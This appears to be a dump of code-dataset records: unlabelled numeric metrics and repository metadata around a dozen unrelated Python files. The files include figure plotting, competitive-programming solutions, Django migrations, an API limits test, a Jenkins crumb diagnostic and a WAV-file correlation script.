0.047598
0.781842
0.714789
0.658377
0.619027
0.559529
0.494302
0
0.006305
0.273393
26,632
657
261
40.535769
0.81448
0.010063
0
0.640212
0
0.001764
0.470215
0.159497
0
0
0
0
0
1
0.001764
false
0
0.001764
0
0.005291
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc09cc4c599dae963fa070fbe9dc0b9a5e9e17c9
1,425
py
Python
code/figure_warp.py
jwcarr/drift
a514c5970ba53025cc142257e953c1bda3cd049c
[ "CC-BY-4.0" ]
2
2021-11-19T10:12:58.000Z
2021-11-30T03:33:59.000Z
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
import numpy as np import eyekit import algorithms import core data = eyekit.io.load(core.FIXATIONS / 'sample.json') passages = eyekit.io.load(core.DATA / 'passages.json') original_sequence = data['trial_5']['fixations'] fixation_XY = np.array([fixation.xy for fixation in original_sequence], dtype=int) word_XY = np.array([word.center for word in passages['1B'].words(alphabetical_only=False)], dtype=int) start_times = np.array([i*100 for i in range(len(word_XY))], dtype=int) expected_sequence = eyekit.FixationSequence(np.column_stack([word_XY, start_times, start_times+100])) diagram = eyekit.vis.Image(1920, 1080) diagram.draw_text_block(passages['1B'], mask_text=True) diagram.draw_fixation_sequence(expected_sequence, color='#E32823', fixation_radius=6) diagram.draw_fixation_sequence(original_sequence, color='#205E84', fixation_radius=6) _, warping_path = algorithms.dynamic_time_warping(fixation_XY, word_XY) for fixation, mapped_words in zip(original_sequence, warping_path): for word_i in mapped_words: word_x, word_y = word_XY[word_i] diagram.draw_line(fixation.xy, (word_x, word_y), color='black', stroke_width=0.5, dashed=True) fig = eyekit.vis.Figure() fig.add_image(diagram) fig.set_crop_margin(2) fig.set_padding(vertical=2, horizontal=3, edge=1) fig.set_enumeration(False) fig.save(core.VISUALS / 'illustration_warp.pdf', width=83) # fig.save(core.FIGS / 'fig02_single_column.eps', width=83)
39.583333
102
0.781754
224
1,425
4.745536
0.424107
0.028222
0.022578
0.030103
0
0
0
0
0
0
0
0.031418
0.084211
1,425
35
103
40.714286
0.783142
0.04
0
0
0
0
0.061493
0.015373
0
0
0
0
0
1
0
false
0.115385
0.153846
0
0.153846
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc109f21dbb2efc4b477a59e275c911d6c56316e
221
py
Python
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
2
2020-06-12T09:54:23.000Z
2021-05-04T01:34:07.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
961
2020-06-23T07:26:22.000Z
2022-03-31T21:34:52.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
null
null
null
# -*- coding: utf-8 -*- def main(): a = input() # See: # https://www.slideshare.net/chokudai/abc007 if a == 'a': print('-1') else: print('a') if __name__ == '__main__': main()
13
48
0.466063
26
221
3.653846
0.730769
0
0
0
0
0
0
0
0
0
0
0.033333
0.321267
221
16
49
13.8125
0.6
0.312217
0
0
0
0
0.081081
0
0
0
0
0
0
1
0.125
false
0
0
0
0.125
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc11f9bf036f8314167de520f758c42b9fa4aa63
2,306
py
Python
designate-8.0.0/designate/tests/test_api/test_v2/test_limits.py
scottwedge/OpenStack-Stein
7077d1f602031dace92916f14e36b124f474de15
[ "Apache-2.0" ]
145
2015-01-02T09:35:53.000Z
2021-12-14T17:03:53.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
6
2015-03-15T00:22:27.000Z
2019-12-16T09:37:38.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
109
2015-01-13T16:47:34.000Z
2021-03-15T13:18:48.000Z
# Copyright 2013 Hewlett-Packard Development Company, L.P. # # Author: Kiall Mac Innes <kiall@managedit.ie> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from designate.tests.test_api.test_v2 import ApiV2TestCase class ApiV2LimitsTest(ApiV2TestCase): def test_get_limits(self): response = self.client.get('/limits/') self.assertEqual(200, response.status_int) self.assertEqual('application/json', response.content_type) self.assertIn('max_zones', response.json) self.assertIn('max_zone_records', response.json) self.assertIn('max_zone_recordsets', response.json) self.assertIn('max_recordset_records', response.json) self.assertIn('min_ttl', response.json) self.assertIn('max_zone_name_length', response.json) self.assertIn('max_recordset_name_length', response.json) self.assertIn('max_page_limit', response.json) absolutelimits = response.json self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones']) self.assertEqual(cfg.CONF.quota_zone_records, absolutelimits['max_zone_recordsets']) self.assertEqual(cfg.CONF['service:central'].min_ttl, absolutelimits['min_ttl']) self.assertEqual(cfg.CONF['service:central'].max_zone_name_len, absolutelimits['max_zone_name_length']) self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len, absolutelimits['max_recordset_name_length']) self.assertEqual(cfg.CONF['service:api'].max_limit_v2, absolutelimits['max_page_limit'])
41.927273
76
0.667823
274
2,306
5.448905
0.434307
0.072338
0.085733
0.112525
0.312793
0.251172
0.134628
0
0
0
0
0.009106
0.238075
2,306
54
77
42.703704
0.840637
0.270598
0
0.15625
0
0
0.183073
0.042617
0
0
0
0
0.5
1
0.03125
false
0
0.0625
0
0.125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
fc1210baa0e8a8267a154dad6a47b17fe2942673
1,696
py
Python
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2015-07-12T07:24:17.000Z
2015-07-12T07:24:17.000Z
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
null
null
null
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2016-02-19T21:55:53.000Z
2016-02-19T21:55:53.000Z
"""node-path implementation for OpenGLContext """ from vrml.vrml97 import nodepath, nodetypes from vrml.cache import CACHE from OpenGLContext import quaternion from OpenGL.GL import glMultMatrixf class _NodePath( object ): """OpenGLContext-specific node-path class At the moment this only adds a single method, transform() which traverses the path, calling transform() for each Transforming node which has a transform method. """ __slots__ = () def transform( self, mode=None, translate=1, scale=1, rotate=1 ): """For each Transforming node, do OpenGL transform Does _not_ push-pop matrices, so do that before if you want to save your current matrix. This method is useful primarily for storing paths to, for instance, bindable nodes, where you want to be able to rapidly transform down to the node, without needing a full traversal of the scenegraph. """ matrix = self.transformMatrix( translate=translate, scale=scale, rotate=rotate ) glMultMatrixf( matrix ) def quaternion( self ): """Get summary quaternion for all rotations in stack""" nodes = [ node for node in self if ( isinstance(node, nodetypes.Transforming) and hasattr( node, "orientation") ) ] q = quaternion.Quaternion() for node in nodes: q = q * quaternion.fromXYZR( *node.orientation ) return q class NodePath( _NodePath, nodepath.NodePath ): pass class WeakNodePath( _NodePath, nodepath.WeakNodePath ): pass
32
69
0.630896
192
1,696
5.526042
0.5
0.06032
0.035815
0.043355
0
0
0
0
0
0
0
0.004223
0.301887
1,696
52
70
32.615385
0.891892
0.373231
0
0.066667
0
0
0.011423
0
0
0
0
0
0
1
0.066667
false
0.066667
0.133333
0
0.366667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc188927db9f5bd43bd5abe64681e14292f26e08
269
py
Python
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
import behave @behave.when('I add $1200 to my account') def add_usd_1200(context): context.account.add_cash(amount=1200) @behave.then('It becomes $3200 in my account') def check_for_increase_to_usd_1880(context): assert context.account.current_cash == 3200
22.416667
47
0.762082
43
269
4.55814
0.581395
0.091837
0.122449
0
0
0
0
0
0
0
0
0.102564
0.130112
269
11
48
24.454545
0.735043
0
0
0
0
0
0.204461
0
0
0
0
0
0.142857
1
0.285714
false
0
0.142857
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc1b9449290073ccef5e51dfe2bdedbc18900050
7,035
py
Python
stats.py
jakeb1996/SBS
3bcc0017d22674d4290be1b272aeac4836f0d5ec
[ "MIT" ]
null
null
null
stats.py
jakeb1996/SBS
3bcc0017d22674d4290be1b272aeac4836f0d5ec
[ "MIT" ]
null
null
null
stats.py
jakeb1996/SBS
3bcc0017d22674d4290be1b272aeac4836f0d5ec
[ "MIT" ]
null
null
null
import matplotlib.pyplot as plt import argparse, csv, numpy, time, os, re def main(resultsFile, toolName): filesToCalc = [] toolNames = [] if os.path.isfile(resultsFile): # the user must have defined an exact file to plot filesToCalc.append(resultsFile) toolNames.append(toolName) else: # check if there are multiple files matching the criteria dir = (os.sep).join(resultsFile.split(os.sep)[:-1]) fileNameStart = resultsFile.split(os.sep)[-1] for (dirpath, dirnames, filenames) in os.walk(dir): for filename in filenames: reMatch = re.search('%s_((aggregate|system)|(\d)+)\\b' % fileNameStart, filename) if bool(reMatch): filesToCalc.append(os.path.join(dirpath, filename)) toolNames.append('%s %s' %(toolName, reMatch.group(1).title())) # start plotting i = 0 while i < len(filesToCalc): stat(filesToCalc[i], toolNames[i]) i = i + 1 def stat(resultsFile, toolName): print 'Running for: %s\n' % toolName TIME_ELAPSED = [] TIME_GAPS = [] config = { 'data-type-default' : int } # the aggregate functions to perform on each set. each is a function name. # user-defined functions at bottom of file stats = [len, min, q1, median, mean, q3, max, std] measurements = { # measurement configurations must appear in the order of the associated CSV columns # --- sample --- # 'stat_name' : { # ['data-type' : float,] # 'data' : [], # 'title' : 'measurement title' # }, # --- end sample --- ### START CHILD PROCESS STATS ### 'time' : { 'data' : [], 'data-type' : float, 'title' : 'Time' }, 'num_threads' : { 'data' : [], 'title' : 'Number of Threads' }, 'cpu_percent' : { 'data' : [], 'data-type' : float, 'title' : 'CPU Utilisation' }, 'mem_rss' : { 'data' : [], 'data-type' : float, 'title' : 'Resident Set Size (RSS) Memory Utilisation' }, 'mem_vms' : { 'data' : [], 'title' : 'Virtual Memory Size (VMS) Memory Utilisation' }, 'io_read_count' : { 'data' : [], 'title' : 'Disk IO Read Count' }, 'io_read_bytes' : { 'data' : [], 'title' : 'Disk IO Read Volume' }, 'io_write_count' : { 'data' : [], 'title' : 'Disk IO Write Count' }, 'io_write_bytes' : { 'data' : [], 'title' : 'Disk IO Write Volume' }, 'child_process_count' : { 'data' : [], 'title' : 'Child Process Count' }, ### START SYSTEM STATS ### # if the stat was defined above, then don't define it again 'mem_used' : { 'data' : [], 'data-type' : float, 'title' : 'Physical Memory Used (megabytes)' }, 'mem_avai' : { 'data' : [], 'data-type' : float, 'title' : 'Physical Memory Available (megabytes)', }, 'process_count' : { 'data' : [], 'title' : 'Process Count' } } # due to dictionaries not being in order, we need to know the order the data appears and # match it with the associated plot configuration above. headerOrder = [] # put all the times in a list timeRecords = [] with open(resultsFile, 'r') as fcsv: dataCsv = csv.reader(fcsv, delimiter=',') # Set the headerOrder and remove the time column header headerOrder = dataCsv.next() firstTime = None for row in dataCsv: # Elapsed time timeRecords.append(float(row[0])) TIME_ELAPSED.append(float(row[0]) - float(timeRecords[0])) if firstTime == False: TIME_GAPS.append(float(row[0]) - measurements['time']['data'][-1]) i = 0 # skip zero as its the time (as above) for measurement in headerOrder: if 'data-type' in measurements[measurement]: measurements[measurement]['data'].append(measurements[measurement]['data-type'](row[i])) else: measurements[measurement]['data'].append(config['data-type-default'](row[i])) i += 1 firstTime = False if len(timeRecords) == 0: print 'No data recorded in %s.\nExiting.\n\n' % resultsFile return 0 resultsFileName = '%s_stats.csv' % resultsFile with open(resultsFileName, 'w') as scsv: print 'Writing to file: %s' % resultsFileName # write headers line scsv.write('measurement,%s\n' % ','.join(map(funcName, stats))) for measurement in headerOrder: line = '%s' % measurement for stat in stats: line = ('%s,%s' % (line, stat(measurements[measurement]['data']))) scsv.write('%s\n' % line) # now, because the time gaps were calculated separately, run the stats on them tool # messy, I know. sorry! line = '%s' % 'time_gaps' for stat in stats: line = ('%s,%s' % (line, stat(TIME_GAPS))) scsv.write('%s\n' % line) # write start and end time scsv.write('start_time,%s,"%s"\nend_time,%s,"%s"\ntime_elapsed,%s,sec,%s,min' % (timeRecords[0], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[0])), timeRecords[-1], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[-1])), (timeRecords[-1] - timeRecords[0]), ((timeRecords[-1] - timeRecords[0]) / 60))) print '\nFinished.' def q1(seq): return numpy.percentile(seq, 25) def median(seq): return numpy.percentile(seq, 50) def mean(seq): return sum(seq) / len(seq) def q3(seq): return numpy.percentile(seq, 75) def std(seq): return numpy.std(seq) def funcName(func): return func.__name__ if __name__ == "__main__": parser = argparse.ArgumentParser(description = 'Plotter for the Software Benchmarking Script') parser.add_argument('-f', help='Results file as input (in csv format)') parser.add_argument('-t', help='Name of tool', default=None) parser.add_argument('--wincntxmnu', help='Indicates SBS stats was launched from the Windows context menu. See README for help.', action='store_true') args = parser.parse_args() # Not used #if args.wincntxmnu: # args.t = raw_input('Enter the plot prefix: ') main(args.f, args.t)
33.341232
338
0.519119
759
7,035
4.749671
0.329381
0.022191
0.021637
0.023578
0.147295
0.058807
0.058807
0.038835
0.038835
0.023301
0
0.007388
0.345842
7,035
210
339
33.5
0.775967
0.157072
0
0.194444
0
0.006944
0.198302
0.016299
0
0
0
0
0
0
null
null
0
0.013889
null
null
0.027778
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc1fa639ebbd112d3143f8455e253cf35ff2e2c9
1,033
py
Python
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
4
2019-06-28T22:46:06.000Z
2020-05-28T08:53:37.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
18
2018-09-26T15:32:11.000Z
2021-10-01T21:57:14.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
11
2017-03-19T18:37:16.000Z
2020-04-06T19:46:09.000Z
from __future__ import print_function import requests import sys import os verbose=True try: username=os.environ['USERNAME'] password=os.environ['PASSWORD'] except: print("Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables") sys.exit(-1) jenkins_url=os.environ['JENKINS_URL'] url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' print(url) if username: crumb = requests.get(url, auth=(username, password)) if crumb.status_code == 200: crumb_headers = dict() crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1] if verbose: print("Got crumb: %s" % crumb.text) else: print("Failed to get crumb") print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:") print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm") print(jenkins_url + "/configureSecurity") sys.exit(-1)
35.62069
120
0.683446
131
1,033
5.29771
0.541985
0.057637
0.023055
0
0
0
0
0
0
0
0
0.008383
0.191675
1,033
28
121
36.892857
0.822754
0
0
0.074074
0
0
0.346563
0.062924
0
0
0
0
0
1
0
false
0.111111
0.148148
0
0.148148
0.296296
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc20aff0ea13fa9ee03eb24e8c0870f91ab872ab
219
py
Python
URI/1-Beginner/1099.py
vicenteneto/online-judge-solutions
4176e2387658f083b980d7b49bc98300a4c28411
[ "MIT" ]
null
null
null
URI/1-Beginner/1099.py
vicenteneto/online-judge-solutions
4176e2387658f083b980d7b49bc98300a4c28411
[ "MIT" ]
null
null
null
URI/1-Beginner/1099.py
vicenteneto/online-judge-solutions
4176e2387658f083b980d7b49bc98300a4c28411
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- for i in range(int(raw_input())): x, y = [int(x) for x in raw_input().split()] if x > y: x, y = y, x x += 1 if x % 2 == 0 else 2 print sum([j for j in range(x, y, 2)])
19.909091
48
0.465753
45
219
2.222222
0.466667
0.08
0
0
0
0
0
0
0
0
0
0.040816
0.328767
219
10
49
21.9
0.639456
0.09589
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0.166667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc241e5e9d6a198e302aa50f27135ed63d4ecd94
629
py
Python
day_ok/schedule/migrations/0027_auto_20210216_1337.py
bostud/day_ok
2bcee68252b698f5818808d1766fb3ec3f07fce8
[ "MIT" ]
null
null
null
day_ok/schedule/migrations/0027_auto_20210216_1337.py
bostud/day_ok
2bcee68252b698f5818808d1766fb3ec3f07fce8
[ "MIT" ]
16
2021-02-27T08:36:19.000Z
2021-04-07T11:43:31.000Z
day_ok/schedule/migrations/0027_auto_20210216_1337.py
bostud/day_ok
2bcee68252b698f5818808d1766fb3ec3f07fce8
[ "MIT" ]
null
null
null
# Generated by Django 3.1.6 on 2021-02-16 11:37 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('schedule', '0026_event'), ] operations = [ migrations.AlterField( model_name='group', name='students', field=models.ManyToManyField(blank=True, to='schedule.Student', verbose_name='Учні'), ), migrations.AlterField( model_name='teacher', name='subjects', field=models.ManyToManyField(blank=True, to='schedule.Subject', verbose_name='Предмети'), ), ]
26.208333
101
0.599364
63
629
5.904762
0.650794
0.107527
0.134409
0.155914
0.241935
0.241935
0.241935
0
0
0
0
0.041575
0.27345
629
23
102
27.347826
0.772429
0.071542
0
0.235294
1
0
0.154639
0
0
0
0
0
0
1
0
false
0
0.058824
0
0.235294
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc2653dfaa764320b8eb71e09ae9ebdeb59fea8c
287
py
Python
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
# input N, M = map(int, input().split()) Ds = [*map(int, input().split())] # compute dp = [False] * (N+1) for ni in range(N+1): if ni == 0: dp[ni] = True for D in Ds: if ni >= D: dp[ni] = dp[ni] or dp[ni-D] # output print("Yes" if dp[-1] else "No")
17.9375
39
0.477352
52
287
2.634615
0.480769
0.116788
0.160584
0.233577
0
0
0
0
0
0
0
0.02
0.303136
287
15
40
19.133333
0.665
0.069686
0
0
0
0
0.019011
0
0
0
0
0
0
1
0
false
0
0
0
0
0.1
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc2e07191680875cf76ef21ec4089df4cb779bed
527
py
Python
exercise/migrations/0016_auto_20191025_1624.py
Arpit8081/Phishtray_Edited_Version
9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8
[ "MIT" ]
2
2020-03-31T12:38:10.000Z
2022-01-21T22:21:06.000Z
exercise/migrations/0016_auto_20191025_1624.py
Arpit8081/Phishtray_Edited_Version
9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8
[ "MIT" ]
252
2018-05-24T14:55:24.000Z
2022-02-26T13:02:10.000Z
exercise/migrations/0016_auto_20191025_1624.py
Arpit8081/Phishtray_Edited_Version
9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8
[ "MIT" ]
11
2018-06-23T14:54:42.000Z
2021-02-19T11:33:44.000Z
# Generated by Django 2.2.6 on 2019-10-25 16:24 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('exercise', '0015_exerciseemailproperties_date_received'), ] operations = [ migrations.AlterField( model_name='exercise', name='copied_from', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'), ), ]
26.35
131
0.666034
60
527
5.733333
0.65
0.069767
0.081395
0.127907
0
0
0
0
0
0
0
0.046229
0.220114
527
19
132
27.736842
0.790754
0.085389
0
0
1
0
0.179167
0.0875
0
0
0
0
0
1
0
false
0
0.153846
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc3188873ff10721356aeaf7e965132781c78f98
793
py
Python
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
#Basics a = "hello" a += " I'm a dog" print(a) print(len(a)) print(a[1:]) #Output: ello I'm a dog print(a[:5]) #Output: hello(index 5 is not included) print(a[2:5])#Output: llo(index 2 is included) print(a[::2])#Step size #string is immutable so you can't assign a[1]= b x = a.upper() print(x) x = a.capitalize() print(x) x = a.split('e') print(x) x = a.split() #splits the string by space print(x) x = a.strip() #removes any whitespace from beginning or the end print(x) x = a.replace('l','xxx') print(x) x = "Insert another string here: {}".format('insert me!') x = "Item One: {} Item Two: {}".format('dog', 'cat') print(x) x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat') print(x) #command-line string input print("Enter your name:") x = input() print("Hello: {}".format(x))
22.027778
63
0.631778
150
793
3.34
0.426667
0.095808
0.097804
0.07984
0.0998
0.047904
0
0
0
0
0
0.011923
0.153846
793
36
64
22.027778
0.734724
0.320303
0
0.285714
0
0
0.280603
0
0
0
0
0
0
1
0
false
0
0
0
0
0.571429
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
fc35043bdda56bc264f387918b5687e34dea2849
1,152
py
Python
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
"""User Model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser # Utilities from .utils import ApiModel class User(ApiModel, AbstractUser): email = models.EmailField( 'email', unique = True, ) USERNAME_FIELD = 'email' REQUIRED_FIELDS = ['username', 'first_name', 'last_name'] is_student = models.BooleanField(default=False) class Meta: verbose_name='Usuario' verbose_name_plural='Usuarios' def __str__(self): return self.username def get_short_name(self): return self.username class ProfileUser(ApiModel): user = models.OneToOneField(User, on_delete=models.CASCADE) approved_courses = models.ManyToManyField('api.ResultContest', related_name='user_aproved_courses', blank=True, null=True) tests_performed = models.ManyToManyField('api.ResultTest', related_name='user_result_test', blank=True) class Meta: verbose_name = 'Usuario - Perfil' verbose_name_plural = 'Usuarios - Perfiles' def __str__(self): return str(self.user)
24
71
0.667535
126
1,152
5.865079
0.492063
0.05954
0.043302
0.054127
0.073072
0
0
0
0
0
0
0
0.233507
1,152
47
72
24.510638
0.83692
0.025174
0
0.206897
0
0
0.138117
0
0
0
0
0
0
1
0.103448
false
0
0.103448
0.103448
0.689655
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc3a04cfd338f72934bd5d86f8126f4adfa55c05
1,330
py
Python
Compare.py
sushantPatrikar/WaveCompartor
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
3
2019-10-27T03:45:18.000Z
2022-02-21T18:50:58.000Z
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
null
null
null
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
1
2021-04-20T07:39:37.000Z
2021-04-20T07:39:37.000Z
from scipy.io import wavfile import numpy as np import pingouin as pg import pandas as pd _,data = wavfile.read('wav//ed//mp3baked.wav') _,data1 = wavfile.read('wav//ing//ingeating.wav') i= data.shape[0]-1 j = data1.shape[0]-1 index_1 = -1 index_2 = -1 try: data.shape[1] except IndexError: data = data.reshape(data.shape[0],1) try: data1.shape[1] except IndexError: data1 = data1.reshape(data1.shape[0],1) while True: if data[i,0] !=0 and index_1==-1: index_1 = i pass if data1[j,0] !=0 and index_2==-1: index_2 = j pass if index_1!=-1 and index_2!=-1: break i-=1 j-=1 data = data[-index_1:,:] data1 = data1[-index_2:,:] data = data[-2000:,:] data1= data1[-2000:,:] x =pg.corr(x=data[:,0],y=data1[:,0]) print(x) # print(data.tostring()) # print(data1.tostring()) # data = data[:,:] # data1 = data1[:,:] # data = data.reshape(data.shape[0],1) # data1 = data1.reshape(data1.shape[0],1) # data = data[-10000:,:] # data1 = data1[-10000:,:] # print(data1.shape[1]) # df = pd.DataFrame(data,data1) # print(df.head()) # print(data1.shape) # data = data[-5000:,:] # data1 = data1[-5000:,:] # # # x =pg.corr(x=data[:,0],y=data1[:,0]) # print(x)
15.647059
50
0.552632
201
1,330
3.597015
0.238806
0.077455
0.058091
0.045643
0.224066
0.224066
0.224066
0.071923
0.071923
0.071923
0
0.094378
0.251128
1,330
84
51
15.833333
0.631526
0.291729
0
0.171429
0
0
0.052443
0.052443
0
0
0
0
0
1
0
false
0.057143
0.114286
0
0.114286
0.028571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc3d3b9be540fd17668cfe15a94b53ed79b67b0a
328
py
Python
UVa 10105 polynomial coefficients/sample/main.py
tadvi/uva
0ac0cbdf593879b4fb02a3efc09adbb031cb47d5
[ "MIT" ]
1
2020-11-24T03:17:21.000Z
2020-11-24T03:17:21.000Z
UVa 10105 polynomial coefficients/sample/main.py
tadvi/uva
0ac0cbdf593879b4fb02a3efc09adbb031cb47d5
[ "MIT" ]
null
null
null
UVa 10105 polynomial coefficients/sample/main.py
tadvi/uva
0ac0cbdf593879b4fb02a3efc09adbb031cb47d5
[ "MIT" ]
1
2021-04-11T16:22:31.000Z
2021-04-11T16:22:31.000Z
import sys import operator sys.stdin = open('input.txt') fact = [1, 1] for i in range(2, 15): fact.append(fact[-1] * i) while True: try: n, k = map(int, raw_input().split()) coef = map(int, raw_input().split()) except: break print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
21.866667
65
0.579268
53
328
3.54717
0.603774
0.053191
0.095745
0.148936
0.202128
0
0
0
0
0
0
0.02449
0.253049
328
14
66
23.428571
0.742857
0
0
0
0
0
0.027439
0
0
0
0
0
0
0
null
null
0
